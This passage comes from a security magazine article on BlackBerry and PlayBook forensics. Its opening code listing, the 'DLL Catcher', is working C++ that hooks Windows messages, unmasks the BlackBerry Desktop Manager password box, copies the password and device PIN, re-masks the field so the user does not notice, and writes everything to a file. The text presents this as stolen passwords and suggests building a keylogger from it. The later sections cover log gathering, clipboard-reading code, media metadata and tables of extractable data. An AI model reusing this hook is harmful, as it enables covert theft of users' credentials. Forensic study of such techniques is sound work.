FreeLibrary(hModule);
}
}
}
//---------------------------------------------------------------------------
void __fastcall TForm1::FormClose(TObject *Sender, TCloseAction &Action)
{
if (xp_seven)
{
if (RunStopHook != NULL)
{
RunStopHook(false, hModule);
}
if (hModule != NULL)
{
FreeLibrary(hModule);
}
}
normally_closed = true;
}
Listing 6. DLL Catcher
HHOOK SysHook;
HWND Wnd;
HINSTANCE hInst;
TStringList *in_list = new TStringList();
//---------------------------------------------------------------------------
int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved)
{
hInst = (HINSTANCE)hinst;
return 1;
}
//---------------------------------------------------------------------------
extern "C" void __export RunStopHook(bool State, HINSTANCE hInstance)
{
if (true)
{
SysHook = SetWindowsHookEx(WH_GETMESSAGE, &SysMsgProc, hInst, 0);
}
else
{
//clear our storage is it’s unhooked
in_list->Clear();
UnhookWindowsHookEx(SysHook);
}
}
//---------------------------------------------------------------------------
LRESULT CALLBACK SysMsgProc(int code, WPARAM wParam, LPARAM lParam)
//hook code, removal flag, address of structure with message
{
//Pass message to other system hooks
CallNextHookEx(SysHook, code, wParam, lParam);
//Check Message
if (code == HC_ACTION)
{
//Get Window’s Handler that give a message
Wnd = ((tagMSG*)lParam)->hwnd;
//ClassName of Window
char *internal = "#32770";
22. Don’t Be Mocked Secure Your System
21 / 108
//Caption of Window
char *external = "Device Password Required";
//Catch a Window
HWND window = FindWindow(internal, external);
if ((bool)(int)window)
{
//Label like "Password:"
char *stat_pass_text = (char *)malloc(256);
//Label like "PIN of Device:"
char *stat_devc_text = (char *)malloc(256);
//Label like "Your attempt counts:"
char *stat_attmp_text = (char *)malloc(256);
//In Z-order first of all get a password-static control
HWND stat_pass = FindWindowEx(window, NULL, "Static", "Password:");
//In Z-order previous of it is attemp’s count
HWND stat_attmp = GetWindow(stat_pass, 3);
//In Z-order next of it is Device PIN
HWND stat_devc = GetWindow(stat_pass, 2);
//get control’s caption for a password-static control
GetWindowText(stat_pass, stat_pass_text, 256);
//get control’s caption for a pin-static control
GetWindowText(stat_attmp, stat_attmp_text, 256);
//get control’s caption for a attemp_count-static control
GetWindowText(stat_devc, stat_devc_text, 256);
AnsiString DEV_PIN = AnsiString(stat_devc_text);
AnsiString ATTEMPT = AnsiString(stat_attmp_text);
//correct a program version:
//if NULL then BlackBerry Manager v4 or BlackBerry Manager v5
//else everythin ’s OK - BlackBerry Desktop Manager v6
if (DEV_PIN.Length() < 1)
{
int pos = AnsiPos("n", AnsiString(ATTEMPT.c_str()));
//extract a first part of Static (PIN)
DEV_PIN = ATTEMPT.SubString(1, pos - 1);
//extract a second part of Static (attempt’ count)
AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT. ←
Length() - pos);
}
free(stat_devc_text);
free(stat_attmp_text);
free(stat_pass_text);
//get handler of EditBox
HWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL);
//Check desirable EditBox (with Parent Form’s Caption "Device ←
Password Requied")
If ( ((bool)(int)pass_hwnd) & (pass_hwnd == Wnd) )
{
//unset password masking
SendMessage(Wnd, EM_SETPASSWORDCHAR, 0, 0);
//ReDraw EditBox
InvalidateRect(Wnd, 0, true);
//allocate memory for edit’s password
char *passw = (char *)malloc(256);
//Password’s borrowing
23. Don’t Be Mocked Secure Your System
22 / 108
SendMessage(Wnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw);
//store in new variable
AnsiString password = AnsiString(passw);
free(passw);
//Don’t let him (user) see it. Paint out.
//0x25CF is unicode character of black circle
//(dialog boxes on Win7, XP).
SendMessageW(Wnd, EM_SETPASSWORDCHAR, 0x25cf, 0);
//ReDraw EditBox
InvalidateRect(Wnd, 0, true);
//If action is unsuccessfull set "EMPTY" info
if (DEV_PIN.Length() == 0)
{
DEV_PIN = "EMPTY";
}
if (ATTEMPT.Length() == 0)
{
ATTEMPT = "EMPTY";
}
if (password.Length() == 0)
{
password = "EMPTY";
}
//Store in StringList variable our PIN, attempts count and ←
pass
in_list->Add(DEV_PIN);
in_list->Add(ATTEMPT);
in_list->Add(password);
try
{
in_list->SaveToFile("c:pass.txt");
}
catch (Exception *ex)
{
}
}
}
}
return 0;
}
Grand Success! Look at figures 14-15. We have just caught a bit more extra-protected password.
24. Don’t Be Mocked Secure Your System
23 / 108
Figure 1.14: Stolen password (v6) - part I
Figure 1.15: Stolen password (v6) - part II
If we manage not with tray application but main BlackBerry Desktop Software (v6-7) then we are not lucky and need to catch
another password dialog built in application as well as backup pass dialog. BlackBerry Manager v4 or v5 is based on C++ (and
method is the same like previous), but BlackBerry Desktop Manager is based on C# and .NET according to PE analyzers. Thus,
it impossible to use WINAPI for stealing. Nevertheless, there’s solving. We still can catch a window dialog like Unlocking
device and Backup device’s data. Look at THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE and figures 16-17
THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE
WINDOW TEXT BlackBerry® Desktop Software
CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;4f73dd50-23b3-416c-9ae3-81d8908073f1]
WINDOW TEXT Unlock BlackBerry® device
CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;606b4596-b8eb-4102-8d62-5c87d2220001]
WINDOW TEXT Back Up Options
CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;547a3dd4-57aa-4e40-a2ea-16b19fd1697e]
25. Don’t Be Mocked Secure Your System
24 / 108
Figure 1.16: BlackBerry Desktop Manager’s Handlers – part I
Figure 1.17: BlackBerry Desktop Manager’s Handlers – part II
According to DLL-Catcher and system hooks is possible to make a key-logger that waiting two handler then stealing a password
and hibernating watcher mechanism.
Gathering Logs
Previous article on forensics mentioned that BlackBerry Smartphone SDK and BlackBerry Desktop Software have two tools
(javaloader, and loader) to provide classic forensic. All PlayBook SDK provided by RIM, e.g. Adobe Air SDK has a tool
"blackberry-connect" is just a wrapper for "Connect.jar". But before connect RSA key-pair should be generated by "ssh-keygen
-t rsa -b 4096" and "Development Mode" option enabled. Then should be typed target ip (often 169.254.0.1 for USB), device
password and ssh key as parameters. This tool extracts device information (like OS, fingerprint, hardware id, vendors id, debug
mode tokens, etc.), application list information (like module, version, icon ID, name, vendor, source, etc.) and more. In addition,
26. Don’t Be Mocked Secure Your System
25 / 108
Wi-Fi logs stored IP, DNS, subnet mask; information about (un-)successful attempts may be analyzed by manual acquisition
only. See section "Device Information", "Application List", and pictures (18-21).
Application List
Info: Sending request: List
Info: Action: List
@applications
IMplus.gYABgI3xb8I_.nuWDj1NQXBLFM0::gYABgI3xb8I_-nuWDj1NQXBLFM0,1.4.0.0,contentID::44726, ←
iconID::291534,name::IM+ for BlackBerry PlayBook,sku::IMPlus_for_BlackBerry_PlayBook, ←
vendor::SHAPE,id::559225,releaseType::1,version::1.4,size::1221509,source::appworld
WeatherEye10856d5e12aafbeab482ffb6197b1513.gYABgIBVxHVXGt5sqs7ysg11.RY:: ←
gYABgIBVxHVXGt5sqs7ysg11-RY,1.1.0.0,contentID::40883,iconID::266669,name::WeatherEye HD, ←
sku::SKU_WEATHEREYEHD1,vendor::The Weather Network,id::286667,releaseType::1,version ←
::1.1,size::1411489,source::appworld
WeatherMap.gYABgKX7io3amtWzWeXo8.d.kSQ::gYABgKX7io3amtWzWeXo8-d-kSQ,1.2.9.350,contentID ←
::33880,iconID::225599,name::Weather Map,sku::WeatherMap,vendor::Christian Ruiz,id ←
::262761,releaseType::1,version::1.2.9,size::1419549,source::appworld
com.facebookforplaybook.gYABgGIoTQuGRMYqlV83okVZick::gYABgGIoTQuGRMYqlV83okVZick,2.2.1.7, ←
contentID::43106,iconID::280252,name::Facebook for BlackBerry PlayBook,sku:: ←
FacebookforPlayBook,vendor::Research In Motion Limited,id::477829,releaseType::1,version ←
::2.2.1.7,size::4382469,source::appworld
sys.uri.twitter.gYABgForKB9INNC6dqqT5_aG.wE::gYABgForKB9INNC6dqqT5_aG-wE,2.0.1.15,source:: ←
websl,scmbundle::2.0.1.358
sys.videochat.gYABgHXmq9LYQB023b3XQAWry1k::gYABgHXmq9LYQB023b3XQAWry1k,2.0.1.247,source:: ←
websl,scmbundle::2.0.1.358
sys.videoplayer.gYABgEydozZr9q.ClZkrItC9LMM::gYABgEydozZr9q-ClZkrItC9LMM,2.0.1.234,source:: ←
websl,scmbundle::2.0.1.358
sys.voicerecorder.gYABgCpT2Fra8qyc1S2btWJS_S4::gYABgCpT2Fra8qyc1S2btWJS_S4,2.0.1.233,source ←
::websl,scmbundle::2.0.1.358
sys.weather.gYABgKOf0EhVEWtCxrbBQ00sPSg::gYABgKOf0EhVEWtCxrbBQ00sPSg,2.0.1.234,source:: ←
websl,scmbundle::2.0.1.358
sys.youtube.gYABgPcyRJTp899l1vKiJZewK88::gYABgPcyRJTp899l1vKiJZewK88,2.0.1.240,source:: ←
websl,scmbundle::2.0.1.358
Device Information
Info: Sending request: List
Info: Sending request: List Device Info
Info: Action: List Device Info
[n]@deviceproperties
device_os::BlackBerry PlayBook OS
drmhwfp:: 0x62xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
fingerprint:: 3pIxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
hardwareid::0x06xxxxxx
radiofingerprint::none
scmbundle::2.0.1.xxx
scmbundle0::2.0.1.xxx
scmbundle1::2.0.1.xxx
vendorid::0x1f8
[n]@deviceproperties
devicepin::0x50xxxxxx
deviceserialnumber::00xxxxxxx13xxx95xxxx
[n]@devmode
[n]debug_token_author::Yury Chemerkin
[n]debug_token_expiration::Sat May 12 00:22:58 GMT+0400 2012
[n]debug_token_installed:b:true
[n]debug_token_timeout::10d
[n]debug_token_valid:b:true
[n]debug_token_validation_error::
[n]debug_token_validation_error_code:n:0
[n]dev_mode_enabled:b:true
[n]dev_mode_expiration::10d
27. Don’t Be Mocked Secure Your System
26 / 108
[n]dev_mode_waiting:b:true
@versions
air_version::3.1.0.38
flash_version::11.1.121.38
build_id:: 186xxx
production_device:b:true
Figure 1.18: Wi-Fi Status and logs
Figure 1.19: Log options
28. Don’t Be Mocked Secure Your System
27 / 108
Figure 1.20: Wi-Fi Info
Figure 1.21: Logs
Wi-Fi Logs
********************************
Wi-Fi Diagnostics Logs
********************************
29. Don’t Be Mocked Secure Your System
28 / 108
******
DEVICE INFORMATION
******
> Physical Address: e8:xx:xx:xx:xx:xx
> Device OS: BlackBerry PlayBook OS
> Device Pin: 500xxxxx
> OS Version: 2.0.1.668
******
INTERNET CONNECTION
******
> IP Address: 192.168.1.31
> Subnet Mask: 255.255.255.0
> Default Gateway: 192.168.1.1
> Primary DNS: 192.168.1.1
> Secondary DNS:
> Domain Suffix:
> MTU: 1500
> Proxy Server:
> Proxy Port:
******
WI-FI INFORMATION
******
> Status: Connected
> Failure Reason:
> Profile Name: XXXX
> SSID: XXXX
> Channel: 11
> AP MAC Address: 48:xx:xx:xx:xx:xx
> Security Type: WPA2 Personal
> EAP Method:
> Signal Level: -41 dBm
> Connection Data Rate: 65 Mbps
> Network Type: 802.11g/n
********************************
Supplicant Logs
********************************
> 21:27:40: 1v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ ←
id=0 id_str=]
> 21:27:40: 2v WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]
> 21:27:39: 3v Associated with 48:xx:xx:xx:xx:xx
> 21:27:39: 4v Trying to associate with 48:xx: xx:1 xx 3:c9:4d (SSID=XXX freq=2462 MHz)
> 21:27:19: 5v CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
> 00:10:34: 6v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ ←
id=0 id_str=]
> 00:10:34: 7v WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]
> 00:10:34: 8v Associated with 48:xx:xx:xx:xx:xx
> 20:41:30: 9v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ ←
id=0 id_str=]
v
> 20:41:30: 10 WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]
> 20:41:30: v11 Associated with 48:xx:xx:xx:xx:xx
v
> 20:41:30: 12 Trying to associate with 48:xx:xx:xx:xx:xx (SSID=’XXXX’ freq=2462 MHz)
v
> 20:26:03: 13 CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
v
> 17:49:29: 14 CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (auth) [id ←
=0 id_str=]
30. Don’t Be Mocked Secure Your System
29 / 108
Backup Data
Managing with backup starts with BlackBerry Desktop Manager that results ".IPD" (early, now it is ".BBB" file is just compress
with tar) in a destination folder. This file stores:
• on BlackBerry smartphone very granulated data (incl. Options) like Address Book, Alarm, Attachment, AutoText, BlackBerry
Bridge, BlackBerry Wallet, Bluetooth, Browser, Calendar, Camera, Certificate, etc.
• on BlackBerry tablet only Application Data, Media and Settings. As PlayBook does not provide native Password Wallet, many
third party applications often save data in shareddocuments folder in ".db" format easy analyzed if no encryption.
BlackBerry Simulation
The BlackBerry Smartphone Simulator built for simulating a backup copy of the physical device. This is helpful if the device is
low on battery, should be placed to the "turn off" state, or you do not want to alter the data on the physical device. Following
steps are suitable for each BlackBerry device model. Nevertheless, there is no similar solution for the PlayBook as well as for
Android, despite of that is very useful and valuable.
Live (Spy) forensic
There some situations that is not desirable to shut down, seize the digital device, and perform the forensic analysis at the lab.
For example, if there is an indication that an encryption mechanism used on the digital device that was discovered, then the
investigator should not shutdown this digital device. Otherwise, after shutdown all encrypted information (potential evidence)
will be unintelligible. By performing Live Analysis, the investigators attempt to extract the encryption key from the running
system.
An up-to-date BlackBerry has many data, such as several mobile or home phone number, faxes, emails, work and home addresses,
web-pages or dates; IM data and social data, private data such as tracking info, habits, time marked a free, time when user’s
possible sleeping, time when user’s at home/company can come to light and many else. However, all those can be extracted only
with API or Backup file.
Clipboard is breakable too because user have to see a password to retype in another application that can easily be screen-captured
or to copy into clipboard that not protected, because user still have to put data (password) into non-protected text-box, sometimes
in plaintext even. In other words, end-point object is vulnerable. As Clipboard API exists like getClipboard() on BlackBerry,
getData() on PlayBook, or getText() on Android (see the Listing 7).
Listing 7. Clipboard events for PlayBook
package
{
import flash.desktop.Clipboard;
import flash.desktop.ClipboardFormats;
import flash.desktop.ClipboardTransferMode;
import flash.display.Sprite;
import flash.display.StageAlign;
import flash.display.StageScaleMode;
import flash.text.TextField;
import qnx.events.ClipboardEvent;
import qnx.events.QNXSystemEvent;
public class Clipboard1 extends Sprite
{
public function Clipboard1()
{
super();
31. Don’t Be Mocked Secure Your System
30 / 108
stage.align = StageAlign.TOP_LEFT;
stage.scaleMode = StageScaleMode.NO_SCALE;
var tf:TextField = new TextField();
tf.height = 600;
tf.width = 1024;
tf.text = "result = n" + paste();
this.addChild(tf);
}
private function write():String
{
return ClipboardEvent.CLIPBOARD_WRITE;
}
private function read():String
{
return ClipboardEvent.CLIPBOARD_READ;
}
private function copy(text:String):void
{
Clipboard.generalClipboard.clear();
Clipboard.generalClipboard.setData(ClipboardFormats.TEXT_FORMAT, ←
text);
}
private function paste():String
{
if(Clipboard.generalClipboard.hasFormat(ClipboardFormats. ←
TEXT_FORMAT))
{
return String(Clipboard.generalClipboard.getData( ←
ClipboardFormats.TEXT_FORMAT));
}
else
{
return null;
}
}
}
}
Figure 1.22: Clipboard Formats
To access to the Pictures, Videos, Voice notes, and other files, some of them may be video captured or audio captured, forensics
expert rarely need to intercept API events or break root rights; all needs is listen file events of creating and deleting files or grab
32. Don’t Be Mocked Secure Your System
31 / 108
these files from internal/external storage. Pictures are more inquisitive as camera-snapshots since it has EXIF-header. Metadata
is, quite simply, data about data. Many digital camera manufacturers, such as Canon, Sony and Kodak implement EXIF headers.
This header is stored in an "application segment" of a JPEG file, or as privately defined tags in a TIFF file. Not only basic
cameras have these headers, but also both mobile devices provide the "Camera Make" as RIM/BlackBerry/Android/HTC data
as well as "Camera Model" may often be device model. GPS or date tag often renames filename by placing into beginning city
name except Android and PlayBook. They place GPS and date tag in EXIF only. Just remind: photos named IMG20120103-
xxxx. To talk about geo-tag per file then I will get a "Moskva" prefix in file name. Of course, it is not enough when city names
named in the same manner like US states, however, it may differ because I cannot test it. Anyway, it is obvious why developers
store name of file as city part, Date part and increment part. Some examples for the PlayBook: camera - Research In Motion,
model – BlackBerry Playbook, exposure – 1/xxx s, diaphragm opening – 2.97, flash – no, EXIF version – 0230. Audio notes,
photos, videos, music, and camera’s data stored in one place (more correctly in two places, on internal storage and external
storage like SD-card if an external exists). Any programmers are allowed to listen these folder path to extract your data in real-
time; moreover they may have exactly API to access to the same folders. They may associate their listeners with specified file
format like AMR (BlackBerry Smartphone) or m4a (BlackBerry Tablet) that used to store your BlackBerry voice notes. They
often store in "voice notes" folder, named as VN-20120319-xxxx.AMR or VN-20120319-xxxx.m4a. "20120319" is date with
YYYY-MM-DD formatting. As you can see, you do not need to extract properties to know when it recorded; you do not even
need to link (programmatically) folder with type file (logical level) because "VN" is voice note. Recorded video files named
"VID-YYYYMMDD-XXXXXX.3GP" as voice note or picture file for BlackBerry Smartphone and VID- XXXXXX.MP4 for
tablet.
Each application has access to its own working directory in the file system on the PlayBook, and might access to the shared folder
(sandbox) because of the access to the files and folders governed by UNIX-style groups and permissions. It means applications
cannot create new directories in the working directory; they can only access the folders listed in Table 1.
Table 1.1: Table 1. Playbook Shared folders structure
Folder What data contains Access type
app The installed application’s files. read-only
data The application’s private data. read and write access
temp The application’s temporary working read and write access
files.
logs System logs for an application (stderr read and write access
and stdout)
shared Subfolders that contain shared data no access
grouped by type.
shared/bookmarks Web browser bookmarks that can be read and write access
shared among applications.
shared/books eBook files that can be shared among read and write access
applications.
shared/clipboard Data copied or cut from another read and write access
application (txt, html, uri format).
shared/documents Documents that can be shared among read and write access
applications.
shared/downloads Web browser downloads. read and write access
shared/misc Miscellaneous data that can be shared read and write access
among applications.
shared/music Music files that can be shared among read and write access
applications.
shared/photos Photos that can be shared among read and write access
applications.
shared/videos Videos that can be shared among read and write access
applications.
shared/voice Audio recordings that can be shared read and write access
among applications.
33. Don’t Be Mocked Secure Your System
32 / 108
Table 1.2: Table 2. Extractable Data
Type BlackBerry OS
BlackBerry Smarpthone BlackBerry Playbook
Address Book + -
Calendar Events + -
Call History + -
Browser history and bookmarks + +
Process Management + -
Memos and Tasks + -
Screen-shots + +
Camera-shots + +
Videocamera-shots + +
Clipboard + +
Location tracking (cell, wifi, gps, + +
bluetooth)
SMS/MMS/Emails/IM + -
Saved Messages + -
Pictures, Videos, Voice notes, and + +
other files
File and Folder structure + +
IMs + -
Passwords + +
Clipboard + +
Conclusion
Mobile devices are everywhere, and contain more evidence about their users than perhaps any other source. The technology is
constantly changing, making forensics a challenge. Handled properly, however, a forensic examination of a mobile device can
yield evidence that cannot be found anywhere else, including communications and geographic location data that can change the
course of an entire case or investigation.
The BlackBerry devices as well as Android devices share the same evidentiary value as any other Personal Digital Assistant
(mobile device). As the investigator may suspect of most file systems, a delete is by no means a total removal of data on
the device. However, the BlackBerry smartphone is always-on, wireless push technology adds a unique dimension to forensic
examination. Android and Playbook instead tends to be more offline and wake up by user actions.
All mentioned above highlights value and up-to-date techniques on forensics area, some of them based on issues misunderstand-
ing development concepts or else. Similar to the BlackBerry, Push-technology allows information be pushed through its radio
antenna at any time, potentially overwriting previously "deleted" data. Classic Forensics techniques or DLP system is ineffective
to stop it because of time, applications that exchanged data in real-time. In addition, the password has a long-term problem.
Some techniques very impactful but limited special cases. It’s obvious Android should be rooted, BlackBerry smartphone should
have a backup or correspond to the forensics methods and tools, while Playbook limits with shared folder only and there’s no
way to root it or mirror all data to the PlayBook simulator as it was for BlackBerry smartphone. The files store on external or
internal storage might be useful to obtain some data stored in backup or available to API. It means forensics needs more practical
and preventive techniques to extract data. Simply using developer’s API helps to grab data like password for social networks or
mail inbox in blackberry smartphone cases that do not stored anywhere. In addition, IM chats do not store else external/internal
storage and can only be accessible in way data extracting but if password is known and storage does not encrypted. It means live
techniques through API make sense only. Moreover, there is technique preventing successful USB or Bluetooth connection as a
live-agent performing DDoS to the event-listener.
Finally, all security holes or vendor vision about security on their OS are very astounding to use, it reduces the risks for loss of
valuable data and improve existing solutions. In addition, forensics expert protected from almost all objectives capable break and
stop forensics investigation.
34. Don’t Be Mocked Secure Your System
33 / 108
On the Net
• To Get Round to the Heart of Fortress. Hakin9 Extra. Yury Chemerkin: http://hakin9.org/to-get-round-to-the-heart-of-fortress/
• Why is password protection a fallacy a point of view, Hakin9 Extra, Yury Chemerkin: http://hakin9.org/hakin9-extra-12011-
exploiting-software/
• The Philosophy of QNX Neutrino: https://developer.blackberry.com/native/documentation
• The QNX Neutrino Microkernel: https://developer.blackberry.com/native/documentation
• Dynamic Linking: https://developer.blackberry.com/native/documentation
• Process Manager: https://developer.blackberry.com/native/documentation
• What is BlackBerry Tablet OS?: https://developer.blackberry.com/native/documentation
• Managing your application through the application life cycle: https://developer.blackberry.com/native/documentation
• Accessing restricted functionality: https://developer.blackberry.com/native/documentation
• Folders accessible by an application: https://developer.blackberry.com/native/documentation
• Filesystems: https://developer.blackberry.com/native/documentation
• Networking Architecture: https://developer.blackberry.com/native/documentation
• TCP/IP Networking: https://developer.blackberry.com/native/documentation
• A Playbook for Real-Time, Closed-Loop Control, Harry Funk, Robert Goldman, Christopher Miller, John Meisner, Peggy Wu,
Smart Information Flow Technologies, LLC: http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA439281
• When Developer’s API Simplify User-Mode Rootkits Developing, Hakin9 Mobile Magazine: http://hakin9.org/hakin9-mobile-
22012-2
• When Developers API Simplify User-Mode Rootkits Development - Part II, Hakin9 OnDemand Magazine: http://hakin9.org/-
hakin9-ondemand-network-security-4124
• "Insecurity of blackberry solutions: Vulnerability on the edge of the technologies," vol. 6, pp. 20-21, December 2011 [Annual
InfoSecurity Russia Conf., 2011]
• D. M. Gomez, A. Davis, BlackBerry PlayBook Security: Part one. NGS Secure, 2011.: http://www.nccgroup.com/secure/-
hVq8hE-N4Wc%3d/1099
• BlackBerry PlayBook Security - Part Two - BlackBerry Bridge, G. Jones, NGS Secure, 2011: http://www.nccgroup.com/-
secure/V20GFyDJrD0%3d/1099
• Mobile Device Forensics: A Brave New World? Contributed by Jason Gonzalez and James Hung, Stroz Friedberg LLC:
http://www.strozfriedberg.com/files/Publication/
• Challenges in Mobile Phone Forensics, Kyle D. Lutes, Richard P. Mislan: http://www.iiis.org/cds2008/cd2008sci/citsa2008/-
paperspdf/i649ok.pdf
• Mobile Forensics: an Overview, Tools, Future trends and Challenges from Law Enforcement perspective, Rizwan Ahmed,
Rajiv V. Dharaskar: http://www.iceg.net/2008/books/2/34_312-323.pdf
35. Don’t Be Mocked Secure Your System
34 / 108
About the author
Yury Chemerkin Graduated at Russian State University for the Humanities (http://rggu.com/) in 2010. At present postgrad-
uate at RSUH. Information Security Researcher since 2009 and currently works as mobile and social information security
researcher in Moscow. Experienced in Reverse Engineering, Software Programming, Cyber & Mobile Security Researching,
Documentation, and Security Writing as regular contributing. Now researching Cloud Security and Social Privacy.
Contacts
I have many social contacts to help you choose the most suitable way for you.
Regular blog: http://security-through-obscurity.blogspot.com
Regular Email: yury.chemerkin@gmail.com
Skype: yury.chemerkin
Other my contacts (blogs, IM, social networks) you will find among http links and social icons before TimeLine section on Re.Vu:
http://re.vu/yury.chemerkin